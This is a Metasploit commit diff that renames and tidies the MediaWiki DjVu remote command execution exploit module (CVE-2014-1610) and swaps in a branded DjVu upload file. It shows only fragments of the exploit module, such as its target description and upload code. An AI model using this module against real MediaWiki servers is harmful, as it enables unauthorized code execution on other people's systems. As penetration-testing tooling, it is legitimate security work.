Use msf branded djvu

2024-07-18 18:31:41 +02:00 · 2014-02-01 00:37:28 +00:00 · 2014-02-01 00:37:28 +00:00 · 486a9d5e19
commit 486a9d5e19
parent 9f35407a0c
3 changed files with 3 additions and 6 deletions
--- a/data/exploits/cve-2014-1610/metasploit.djvu
+++ b/data/exploits/cve-2014-1610/metasploit.djvu
--- a/data/exploits/cve-2014-1610/readme.md
+++ b/data/exploits/cve-2014-1610/readme.md
@ -0,0 +1 @@
+Any DjVu file can be used this is just a snazzy Metasploit one
--- a/modules/exploits/multi/http/mediawiki_djvu.rb
+++ b/modules/exploits/multi/http/mediawiki_djvu.rb
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name' => 'MediaWiki DjVu Authenticated Remote Code Execution',
+      'Name' => 'MediaWiki DjVu Authenticated Remote Command Execution',
      'Description' => %q{
        MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,
      when DjVu file upload support is enabled, allows remote authenticated
@ -37,10 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP, # Could do ARCH_CMD
-      'Payload'    =>
-        {
-          'BadChars' => "", # http://www.mediawiki.org/wiki/Help:Formatting
-        },
      'Targets' =>
        [
          [ 'Automatic', { } ],
@ -173,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote

    upload_mime = Rex::MIME::Message.new

-    djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "Alice_in_Wonderland.djvu"))
+    djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))
    file_name = "#{rand_text_alpha(4)}.djvu"

    upload_mime.add_part(djvu_file, "application/octet-stream", nil, "form-data; name=\"wpUploadFile\"; filename=\"#{file_name}\"")
				`@ -0,0 +1 @@`
				`Any DjVu file can be used this is just a snazzy Metasploit one`